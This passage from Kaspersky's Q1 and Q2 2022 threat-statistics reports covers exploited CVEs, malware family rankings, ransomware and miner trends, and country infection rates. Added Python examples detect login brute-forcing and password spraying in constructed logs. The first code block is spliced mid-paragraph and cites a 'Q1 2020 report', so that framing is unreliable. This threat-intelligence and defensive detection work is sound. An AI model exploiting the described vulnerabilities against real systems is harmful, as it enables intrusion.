code is reached only if trailer support has been switched on through the EnableTrailerSupport registry value, so removing that value is the documented workaround there. Attacks that will probably also become common are RCE attacks on the popular Spring Framework and Spring Cloud Gateway, for example [CVE-2022-22965](<https://nvd.nist.gov/vuln/detail/CVE-2022-22965>) (Spring4Shell) and [CVE-2022-22947](<https://nvd.nist.gov/vuln/detail/CVE-2022-22947>).\n\n### Vulnerability statistics\n\nQ1 2022 saw an array of changes in the statistics on common vulnerability types. The top place is still firmly held by exploits for vulnerabilities in Microsoft Office, whose share has grown significantly to 78.5%. The same common vulnerabilities we have written about on more than one occasion remain the most widely exploited within this category of threats. 
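Both reports single out password brute-forcing against RDP, MSSQL and SMB as a staple of network attacks (the Q1 2020 report's note on Remote Desktop Services, SQL Server and SMB, and the network-threats paragraph above). The detection logic below is an added example, not part of either report: it walks Windows Security event 4625 (failed logon) records in the shape a log forwarder would deliver them and separates classic brute force (many failures against one account from one source) from password spraying (one or two failures each against many accounts). The events are constructed in `constructed_events()`; the thresholds and window lengths are assumptions to tune to the environment's baseline.

```python
import json
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Windows logon types of interest in event 4625, "An account failed to log on".
# Type 3 (network) is what SMB sessions and RDP with Network Level Authentication
# produce; type 10 is a RemoteInteractive (RDP) session. SQL Server logins that use
# SQL authentication are recorded by SQL Server itself (error 18456), not here.
LOGON_TYPES = {3: "network (SMB, RPC, RDP with NLA)", 10: "remote interactive (RDP)"}


def parse_jsonl(text):
    """Parse newline-delimited JSON records as a log forwarder would emit them."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def detect_failed_logons(events, brute_threshold=10, brute_window=60,
                         spray_threshold=10, spray_window=300):
    """Return {src_ip: {...}} for sources whose failures look like brute force
    (>= brute_threshold failures against one account within brute_window seconds)
    or password spraying (>= spray_threshold distinct accounts within spray_window
    seconds). Thresholds are assumptions, not values from the reports."""
    per_account = defaultdict(deque)   # (src, user) -> timestamps inside the window
    per_source = defaultdict(deque)    # src -> (timestamp, user) inside the window
    logon_types = defaultdict(set)
    findings = {}

    def entry(src):
        return findings.setdefault(src, {"brute_force": set(), "password_spray": set()})

    for e in sorted(events, key=lambda rec: rec["ts"]):
        if e.get("event_id") != 4625:
            continue
        ts, src, user = _ts(e["ts"]), e["src_ip"], e["user"].lower()
        logon_types[src].add(e["logon_type"])

        q = per_account[(src, user)]
        q.append(ts)
        while ts - q[0] > timedelta(seconds=brute_window):
            q.popleft()
        if len(q) >= brute_threshold:
            entry(src)["brute_force"].add(user)

        s = per_source[src]
        s.append((ts, user))
        while ts - s[0][0] > timedelta(seconds=spray_window):
            s.popleft()
        targets = {u for _, u in s}
        if len(targets) >= spray_threshold:
            entry(src)["password_spray"].update(targets)

    return {src: {"brute_force": sorted(f["brute_force"]),
                  "password_spray": sorted(f["password_spray"]),
                  "logon_types": sorted(logon_types[src])}
            for src, f in findings.items()}


def _event(ts, src, user, logon_type):
    return {"ts": ts.strftime("%Y-%m-%dT%H:%M:%SZ"), "event_id": 4625,
            "src_ip": src, "user": user, "logon_type": logon_type}


def constructed_events():
    """Constructed sample telemetry (not real data): one SMB brute-force source,
    one RDP password-spraying source and one user mistyping a password."""
    base = datetime(2022, 3, 1, 9, 0, 0)
    events = []
    for i in range(12):   # 12 failures in 22 s against one account
        events.append(_event(base + timedelta(seconds=2 * i), "203.0.113.7", "administrator", 3))
    for i in range(15):   # one failure each against 15 accounts in under 2 min
        events.append(_event(base + timedelta(seconds=8 * i), "192.0.2.9", "user%02d" % i, 10))
    for i in range(3):    # three failures: an ordinary typo, below both thresholds
        events.append(_event(base + timedelta(seconds=20 * i), "198.51.100.5", "jdoe", 10))
    return events


if __name__ == "__main__":
    for src, f in detect_failed_logons(constructed_events()).items():
        kinds = ", ".join(LOGON_TYPES.get(t, str(t)) for t in f["logon_types"])
        print(src, "|", kinds, "| brute force:", f["brute_force"],
              "| sprayed accounts:", len(f["password_spray"]))
```

The two sliding windows are deliberately separate: a sprayer never trips a per-account threshold, and a brute-forcer hammering one account never trips the distinct-account threshold, so a rule that only counts failures per source would have to pick one blind spot. Feed real data with `detect_failed_logons(parse_jsonl(open("4625.jsonl").read()))`, and remember that the source address in 4625 is empty for some local and Kerberos failures, which this example does not special-case.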
These are [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>) and [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>), which cause a buffer overflow in the Equation Editor component when it processes objects in a specially crafted document and ultimately allow an attacker to execute arbitrary code. There is also [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), where opening a specially crafted file with an affected version of Microsoft Office gives attackers the opportunity to perform various actions on the vulnerable system. Another vulnerability found last year that remains very popular with cybercriminals is [CVE-2021-40444](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40444>), a bug in the MSHTML engine that is exploited through a specially prepared Microsoft Office document with an embedded malicious ActiveX control, resulting in arbitrary code execution on the system.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231538/09-en-malware-report-q1-2022-pc.png>))_\n\nExploits targeting browsers came second again in Q1, although their share dropped markedly, to just 7.64%. Browser developers put a great deal of effort into patching vulnerabilities in each new version and closing a large number of security gaps. Apart from that, most browsers update automatically, unlike Microsoft Office, where many users still run outdated versions and are in no rush to install security updates. That could be precisely why the share of browser exploits in our statistics has fallen. However, this does not mean they are no longer an immediate threat. 
For instance, Chrome's developers fixed a number of critical RCE vulnerabilities, including:\n\n * [CVE-2022-1096](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-1096>): a "type confusion" vulnerability in the V8 script engine that gives attackers remote code execution (RCE) inside the browser's renderer sandbox; a separate sandbox-escape bug is needed to reach the rest of the system.\n * [CVE-2022-0609](<https://nvd.nist.gov/vuln/detail/CVE-2022-0609>): a use-after-free vulnerability in the Animation component that lets a specially crafted script corrupt process memory and execute arbitrary code remotely.\n\nSimilar vulnerabilities were found in other browser components: [CVE-2022-0605](<https://nvd.nist.gov/vuln/detail/CVE-2022-0605>), a use-after-free in the Webstore API, and [CVE-2022-0606](<https://nvd.nist.gov/vuln/detail/CVE-2022-0606>), a use-after-free in the WebGL backend (ANGLE). Another one, [CVE-2022-0604](<https://nvd.nist.gov/vuln/detail/CVE-2022-0604>), is a heap buffer overflow in Tab Groups that can also potentially lead to remote code execution (RCE).\n\nExploits for Android came third in our statistics (4.10%), followed by exploits targeting the Adobe Flash Platform (3.49%), PDF files (3.48%) and Java apps (2.79%).\n\n## Attacks on macOS\n\nThe year began with a number of interesting multi-platform finds: the [Gimmick](<https://www.securityweek.com/chinese-cyberspies-seen-using-macos-variant-gimmick-malware>) malware family, with Windows and macOS variants that use Google Drive to communicate with the C&C server, and the [SysJoker backdoor](<https://threatpost.com/undetected-sysjoker-backdoor-malwarewindows-linux-macos/177532/>), with versions tailored for Windows, Linux and macOS.\n\n**TOP 20 threats for macOS**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | AdWare.OSX.Pirrit.ac | 13.23 \n2 | AdWare.OSX.Pirrit.j | 12.05 \n3 | Monitor.OSX.HistGrabber.b | 8.83 \n4 | 
AdWare.OSX.Pirrit.o | 7.53 \n5 | AdWare.OSX.Bnodlero.at | 7.41 \n6 | Trojan-Downloader.OSX.Shlayer.a | 7.06 \n7 | AdWare.OSX.Pirrit.aa | 6.75 \n8 | AdWare.OSX.Pirrit.ae | 6.07 \n9 | AdWare.OSX.Cimpli.m | 5.35 \n10 | Trojan-Downloader.OSX.Agent.h | 4.96 \n11 | AdWare.OSX.Pirrit.gen | 4.76 \n12 | AdWare.OSX.Bnodlero.bg | 4.60 \n13 | AdWare.OSX.Bnodlero.ax | 4.45 \n14 | AdWare.OSX.Agent.gen | 3.74 \n15 | AdWare.OSX.Agent.q | 3.37 \n16 | Backdoor.OSX.Twenbc.b | 2.84 \n17 | Trojan-Downloader.OSX.AdLoad.mc | 2.81 \n18 | Trojan-Downloader.OSX.Lador.a | 2.81 \n19 | AdWare.OSX.Bnodlero.ay | 2.81 \n20 | Backdoor.OSX.Agent.z | 2.56 \n \n_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._\n\nThe TOP 20 threats to users detected by Kaspersky security solutions for macOS is usually dominated by various adware apps. The top two places in the rating were taken by adware apps from the AdWare.OSX.Pirrit family, while third place was taken by a member of the Monitor.OSX.HistGrabber.b family of potentially unwanted software which sends users' browser history to its owners' servers.\n\n### Geography of threats for macOS\n\n_Geography of threats for macOS, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231608/10-en-malware-report-q1-2022-pc.png>))_\n\n**TOP 10 countries by share of attacked users**\n\n| **Country*** | **%**** \n---|---|--- \n1 | France | 2.36 \n2 | Spain | 2.29 \n3 | Italy | 2.16 \n4 | Canada | 2.15 \n5 | India | 1.95 \n6 | United States | 1.90 \n7 | Russian Federation | 1.83 \n8 | United Kingdom | 1.58 \n9 | Mexico | 1.49 \n10 | Australia | 1.36 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000)._ \n_** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nIn Q1 2022, the country where the most users 
were attacked was France (2.36%), followed by Spain (2.29%) and Italy (2.16%). Adware from the Pirrit family was encountered most frequently out of all macOS threats in the listed countries.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q1 2022, most devices that attacked Kaspersky traps did so using the Telnet protocol as before. Just one quarter of devices attempted to brute-force our SSH traps.\n\nTelnet | 75.28% \n---|--- \nSSH | 24.72% \n \n**_Distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2022_**\n\nIf we look at sessions involving Kaspersky honeypots, we see far greater Telnet dominance.\n\nTelnet | 93.16% \n---|--- \nSSH | 6.84% \n \n**_Distribution of cybercriminal working sessions with Kaspersky traps, Q1 2022_**\n\n**TOP 10 threats delivered to IoT devices via Telnet**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 38.07 \n2 | Trojan-Downloader.Linux.NyaDrop.b | 9.26 \n3 | Backdoor.Linux.Mirai.ba | 7.95 \n4 | Backdoor.Linux.Gafgyt.a | 5.55 \n5 | Trojan-Downloader.Shell.Agent.p | 4.62 \n6 | Backdoor.Linux.Mirai.ad | 3.89 \n7 | Backdoor.Linux.Gafgyt.bj | 3.02 \n8 | Backdoor.Linux.Agent.bc | 2.76 \n9 | RiskTool.Linux.BitCoinMiner.n | 2.00 \n10 | Backdoor.Linux.Mirai.cw | 1.98 \n \n_* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats._\n\nSimilar IoT-threat statistics [are published in the DDoS report](<https://securelist.com/ddos-attacks-in-q1-2022/105045/#attacks-on-iot-honeypots>) for Q1 2022.\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. 
Cybercriminals create such sites on purpose and web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries and territories that serve as sources of web-based attacks: TOP 10\n\n_The following statistics show the distribution by country or territory of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted._\n\nIn Q1 2022, Kaspersky solutions blocked 1,216,350,437 attacks launched from online resources across the globe. 313,164,030 unique URLs were recognized as malicious by Web Anti-Virus components.\n\n_Distribution of web-attack sources by country and territory, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231643/11-en-malware-report-q1-2022-pc.png>))_\n\n### Countries and territories where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries and territories, for each country or territory we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. 
The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries and territories.\n\nThis rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Taiwan | 22.63 \n2 | Tunisia | 21.57 \n3 | Algeria | 16.41 \n4 | Mongolia | 16.05 \n5 | Serbia | 15.96 \n6 | Libya | 15.67 \n7 | Estonia | 14.45 \n8 | Greece | 14.37 \n9 | Nepal | 14.01 \n10 | Hong Kong | 13.85 \n11 | Yemen | 13.17 \n12 | Sudan | 13.08 \n13 | Slovenia | 12.94 \n14 | Morocco | 12.82 \n15 | Qatar | 12.78 \n16 | Croatia | 12.53 \n17 | Republic of Malawi | 12.33 \n18 | Sri Lanka | 12.28 \n19 | Bangladesh | 12.26 \n20 | Palestine | 12.23 \n \n_* Excluded are countries and territories with relatively few Kaspersky users (under 10,000)._ \n_** Unique users targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky products in the country or territory._\n\nOn average during the quarter, 8.18% of computers of Internet users worldwide were subjected to at least one **Malware-class** web attack.\n\n_Geography of web-based malware attacks, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/27074233/13-en-malware-report-q1-2022-pc-1.png>))_\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules in Kaspersky products. 
It takes into account malicious programs that were found directly on users' computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q1 2022, our File Anti-Virus detected **58,989,058** malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nNote that this rating only includes attacks by malicious programs that fall under the **Malware class**; it does not include File Anti-Virus triggerings in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country*** | **%**** \n---|---|--- \n1 | Yemen | 48.38 \n2 | Turkmenistan | 47.53 \n3 | Tajikistan | 46.88 \n4 | Cuba | 45.29 \n5 | Afghanistan | 42.79 \n6 | Uzbekistan | 41.56 \n7 | Bangladesh | 41.34 \n8 | South Sudan | 39.91 \n9 | Ethiopia | 39.76 \n10 | Myanmar | 37.22 \n11 | Syria | 36.89 \n12 | Algeria | 36.02 \n13 | Burundi | 34.13 \n14 | Benin | 33.81 \n15 | Rwanda | 33.11 \n16 | Sudan | 32.90 \n17 | Tanzania | 32.39 \n18 | Kyrgyzstan | 32.26 \n19 | Venezuela | 32.00 \n20 | Iraq | 31.93 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\n_Geography of local infection attempts, Q1 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/05/25231744/13-en-malware-report-q1-2022-pc.png>))_\n\nOverall, 15.48% of user computers globally faced at least one 
Malware-class local threat during Q1. Russia scored 16.88% in this rating.\n\n_Source: "IT threat evolution in Q1 2022. Non-mobile statistics", Securelist, published 2022-05-27, <https://securelist.com/it-threat-evolution-in-q1-2022-non-mobile-statistics/106531/>. Vulnerabilities discussed: CVE-2017-11882, CVE-2017-8570, CVE-2018-0802, CVE-2021-40444, CVE-2022-0604, CVE-2022-0605, CVE-2022-0606, CVE-2022-0609, CVE-2022-0847, CVE-2022-1096, CVE-2022-21836, CVE-2022-21882, CVE-2022-21919, CVE-2022-22947, CVE-2022-22965._\n\n# IT threat evolution in Q2 2022. Non-mobile statistics\n\n * [IT threat evolution in Q2 2022](<https://securelist.com/it-threat-evolution-q2-2022/107099/>)\n * **IT threat evolution in Q2 2022. Non-mobile statistics**\n * [IT threat evolution in Q2 2022. 
Mobile statistics](<https://securelist.com/it-threat-evolution-in-q2-2022-mobile-statistics/107123/>)\n\n_These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q2 2022:\n\n * Kaspersky solutions blocked 1,164,544,060 attacks from online resources across the globe.\n * Web Anti-Virus recognized 273,033,368 unique URLs as malicious. Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 100,829 unique users.\n * Ransomware attacks were defeated on the computers of 74,377 unique users.\n * Our File Anti-Virus detected 55,314,176 unique malicious and potentially unwanted objects.\n\n## Financial threats\n\n### Financial threat statistics\n\nIn Q2 2022, Kaspersky solutions blocked the launch of malware designed to steal money from bank accounts on the computers of 100,829 unique users.\n\n_Number of unique users attacked by financial malware, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025224/01-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\n**Geography of financial malware attacks**\n\n_To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country and territory we calculated the share of Kaspersky users who faced this threat during the reporting period as a percentage of all users of our products in that country or territory._\n\n_Geography of financial malware attacks, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025321/02-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\n**TOP 10 countries and territories by share of attacked users**\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Turkmenistan | 4.8 \n2 | Afghanistan | 4.3 \n3 | Tajikistan | 3.8 \n4 | Paraguay | 3.1 \n5 | China | 
2.4 \n6 | Yemen | 2.4 \n7 | Uzbekistan | 2.2 \n8 | Sudan | 2.1 \n9 | Egypt | 2.0 \n10 | Mauritania | 1.9 \n \n_* Excluded are countries and territories with relatively few Kaspersky product users (under 10,000)._ \n_** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\n**TOP 10 banking malware families**\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | Ramnit/Nimnul | Trojan-Banker.Win32.Ramnit | 35.5 \n2 | Zbot/Zeus | Trojan-Banker.Win32.Zbot | 15.8 \n3 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 6.4 \n4 | Trickster/Trickbot | Trojan-Banker.Win32.Trickster | 6.0 \n5 | RTM | Trojan-Banker.Win32.RTM | 2.7 \n6 | SpyEye | Trojan-Spy.Win32.SpyEye | 2.3 \n7 | IcedID | Trojan-Banker.Win32.IcedID | 2.1 \n8 | Danabot | Trojan-Banker.Win32.Danabot | 1.9 \n9 | BitStealer | Trojan-Banker.Win32.BitStealer | 1.8 \n10 | Gozi | Trojan-Banker.Win32.Gozi | 1.3 \n \n_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\n## Ransomware programs\n\n### Quarterly trends and highlights\n\nIn the second quarter, the Lockbit group [launched a bug bounty program](<https://www.bleepingcomputer.com/news/security/lockbit-30-introduces-the-first-ransomware-bug-bounty-program/>). The cybercriminals are promising $1,000 to $1,000,000 for doxing senior officials, for reporting vulnerabilities in their web service, their Tox messenger or the ransomware Trojan's algorithms, and for ideas on improving the Lockbit website and Trojan. This was the first time a ransomware group had run a campaign of this kind, which doubles as self-promotion.\n\nAnother well-known group, Conti, said it was shutting down operations. 
The announcement followed a high-profile attack on Costa Rica's information systems, which prompted the government to [declare a state of emergency](<https://www.bleepingcomputer.com/news/security/costa-rica-declares-national-emergency-after-conti-ransomware-attacks/>). The Conti infrastructure was shut down in late June, but some in the infosec community believe that Conti members are either just rebranding or have split up and joined other ransomware teams, including Hive, AvosLocker and BlackCat.\n\nWhile some ransomware groups are drifting into oblivion, others seem to be making a comeback. REvil's website went back online in April, and researchers [discovered](<https://www.bleepingcomputer.com/news/security/revil-ransomware-returns-new-malware-sample-confirms-gang-is-back/>) a newly built specimen of their Trojan. This might have been a test build, as the sample did not encrypt any files, but these events may herald the impending return of REvil.\n\nKaspersky researchers found a way to recover files encrypted by the Yanluowang ransomware and [released a decryptor](<https://securelist.ru/how-to-recover-files-encrypted-by-yanluowang/105019/>) for all victims. 
Yanluowang has been spotted in targeted attacks against large businesses in the US, Brazil, Turkey, and other countries.\n\n### Number of new modifications\n\nIn Q2 2022, we detected 15 new ransomware families and 2,355 new modifications of this malware type.\n\n_Number of new ransomware modifications, Q2 2021 to Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025415/03-en-ru-es-malware-report-q2-2022-pc-stat-graphs.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nIn Q2 2022, Kaspersky products and technologies protected 74,377 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware Trojans, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025443/04-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\n### Geography of attacked users\n\n_Geography of attacks by ransomware Trojans, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025517/05-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\n**TOP 10 countries and territories attacked by ransomware Trojans**\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Bangladesh | 1.81 \n2 | Yemen | 1.24 \n3 | South Korea | 1.11 \n4 | Mozambique | 0.82 \n5 | Taiwan | 0.70 \n6 | China | 0.46 \n7 | Pakistan | 0.40 \n8 | Angola | 0.37 \n9 | Venezuela | 0.33 \n10 | Egypt | 0.32 \n \n_* Excluded are countries and territories with relatively few Kaspersky users (under 50,000)._ \n_** Unique users whose computers were attacked by Trojan encryptors as a percentage of all unique users of Kaspersky products in the country._\n\n### TOP 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts*** | **Percentage of attacked users**** \n---|---|---|--- \n1 | Stop/Djvu | Trojan-Ransom.Win32.Stop | 17.91 \n2 | WannaCry | Trojan-Ransom.Win32.Wanna | 12.58 \n3 | Magniber | Trojan-Ransom.Win64.Magni | 9.80 \n4 | (generic verdict) | 
Trojan-Ransom.Win32.Gen | 7.91 \n5 | (generic verdict) | Trojan-Ransom.Win32.Phny | 6.75 \n6 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 6.55 \n7 | (generic verdict) | Trojan-Ransom.Win32.Crypren | 3.51 \n8 | (generic verdict) | Trojan-Ransom.MSIL.Encoder | 3.02 \n9 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom / Virus.Win32.PolyRansom | 2.96 \n10 | (generic verdict) | Trojan-Ransom.Win32.Instructions | 2.69 \n \n_* Statistics are based on detection verdicts of Kaspersky products. The information was provided by Kaspersky product users who consented to provide statistical data._ \n_** Unique Kaspersky users attacked by specific ransomware Trojan families as a percentage of all unique users attacked by ransomware Trojans._\n\n## Miners\n\n### Number of new miner modifications\n\nIn Q2 2022, Kaspersky solutions detected 40,788 new modifications of miners. The vast majority of these (more than 35,000) were detected in June. Thus the spring lull (from March through May we found no more than 10,000 new modifications in total) was followed by a record of sorts.\n\n_Number of new miner modifications, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025548/06-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\n### Number of users attacked by miners\n\nIn Q2, we detected attacks using miners on the computers of 454,385 unique users of Kaspersky products and services worldwide. 
We are seeing a reverse trend here: miner attacks have gradually declined since the beginning of 2022.\n\n_Number of unique users attacked by miners, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025613/07-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\n### Geography of miner attacks\n\n_Geography of miner attacks, Q2 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/08/15025642/08-en-malware-report-q2-2022-pc-stat-graphs.png>))_\n\n**TOP 10 countries and territories attacked by miners**\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Rwanda | 2.94 \n2 | Ethiopia | 2.67 \n3 | Tajikistan | 2.35 \n4 | Tanzania | 1.98 \n5 | Kyrgyzstan | 1.94 \n6 | Uzbekistan | 1.88 \n7 | Kazakhstan | 1.84 \n8 | Venezuela | 1.80 \n9 | Mozambique | 1.68 \n10 | Ukraine | 1.56 \n \n_* Excluded are countries and territories with relatively few users of Kaspersky products (under 50,000)._ \n_** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by criminals during cyberattacks\n\n### Quarterly highlights\n\nDuring Q2 2022, a number of major vulnerabilities were discovered in Microsoft Windows. For instance, the critical [CVE-2022-26809](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809>) allows an attacker to remotely execute arbitrary code on a system by sending a specially crafted RPC request. The Network File System (NFS) driver was found to contain two RCE vulnerabilities, [CVE-2022-24491](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24491>) and [CVE-2022-24497](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24497>): by sending a specially crafted NFS request, an attacker can likewise execute arbitrary code remotely. Both vulnerabilities affect server systems with the NFS role enabled. 
The [CVE-2022-24521](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24521>) vulnerability in the Common Log File System (CLFS) driver was found being exploited in the wild. It allows local privilege elevation, although the attacker must already have a foothold on the system. [CVE-2022-26925](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26925>), also known as LSA Spoofing, was another vulnerability found being exploited against live server systems. It allows an unauthenticated attacker to call an LSARPC interface method and coerce a Windows domain controller into authenticating to the attacker over NTLM; the captured authentication can then be relayed to another service. The patch should therefore be combined with the usual NTLM relay hardening, such as Extended Protection for Authentication on relay targets like AD CS and restricting NTLM where possible. These vulnerabilities are an enduring testament to the importance of timely OS and software updates.\n\nMost of the network threats detected in Q2 2022 had been mentioned in previous reports. Most of those were attacks that involved [brute-forcing](<https://encyclopedia.kaspersky.com/glossary/brute-force/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) access to various network services. The protocols and technologies most often targeted by these attacks are MS SQL Server, RDP and SMB. Attacks that use the EternalBlue, EternalRomance and similar exploits are still popular. Exploitation of the Log4j vulnerability ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2021-44228>)) is also quite common, as the vulnerable Java library is widely used in web applications. In addition, the Spring MVC framework, used in many Java-based web applications, was found to contain a new vulnerability, [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>), in its data binding functionality that results in remote code execution. 
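Both quarterly reports above single out password brute-forcing against MS SQL Server, RDP and SMB as the most common network threat. The detection that catches it is the same in every case: count failed logins per source address in a sliding time window and alert past a threshold, while recording the set of user names tried so that password spraying (many users, few attempts each) is visible too. The example below is added here and is not Kaspersky's code; it parses constructed lines in the format of the SQL Server ERRORLOG failed-login message (error 18456, "Login failed for user ... [CLIENT: ip]"), with made-up timestamps, user names and documentation-range addresses. Threshold and window values are illustrative assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample in the shape of SQL Server ERRORLOG failed-login lines.
# Addresses are RFC 5737 documentation ranges; users and times are invented.
SAMPLE_LOG = """\
2022-05-03 10:00:01.23 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.7]
2022-05-03 10:00:01.61 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.7]
2022-05-03 10:00:02.05 Logon       Login failed for user 'admin'. Reason: Could not find a login matching the name provided. [CLIENT: 203.0.113.7]
2022-05-03 10:00:02.40 Logon       Login failed for user 'backup'. Reason: Could not find a login matching the name provided. [CLIENT: 203.0.113.7]
2022-05-03 10:00:02.88 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 203.0.113.7]
2022-05-03 10:14:55.10 Logon       Login failed for user 'reporting'. Reason: Password did not match that for the login provided. [CLIENT: 198.51.100.20]
2022-05-03 10:30:07.00 Logon       Login failed for user 'reporting'. Reason: Password did not match that for the login provided. [CLIENT: 198.51.100.20]
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+\s+Logon\s+"
    r"Login failed for user '(?P<user>[^']*)'.*\[CLIENT: (?P<ip>[^\]]+)\]"
)


def parse_failed_logins(text):
    """Yield (timestamp, user, client_ip) for every failed-login line;
    lines that do not match (startup banners, other errors) are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"), m["user"], m["ip"]


def detect_bruteforce(events, threshold=5, window=timedelta(seconds=60)):
    """Sliding-window detector. Events must arrive in time order, as they do in
    the log. A client IP is flagged once it has produced `threshold` failures
    within `window`. Returns {ip: {"first": ts, "last": ts, "failures": n,
    "users": [...]}} for flagged IPs; a long user list with few attempts per
    user is the password-spraying signature."""
    recent = defaultdict(deque)   # ip -> timestamps still inside the window
    users = defaultdict(set)
    totals = defaultdict(int)
    alerts = {}
    for ts, user, ip in events:
        totals[ip] += 1
        users[ip].add(user)
        q = recent[ip]
        q.append(ts)
        while ts - q[0] > window:   # terminates: q always holds ts itself
            q.popleft()
        if len(q) >= threshold:
            alert = alerts.setdefault(ip, {"first": q[0]})
            alert["last"] = ts
            alert["failures"] = totals[ip]
            alert["users"] = sorted(users[ip])
    return alerts


if __name__ == "__main__":
    for ip, a in detect_bruteforce(parse_failed_logins(SAMPLE_LOG)).items():
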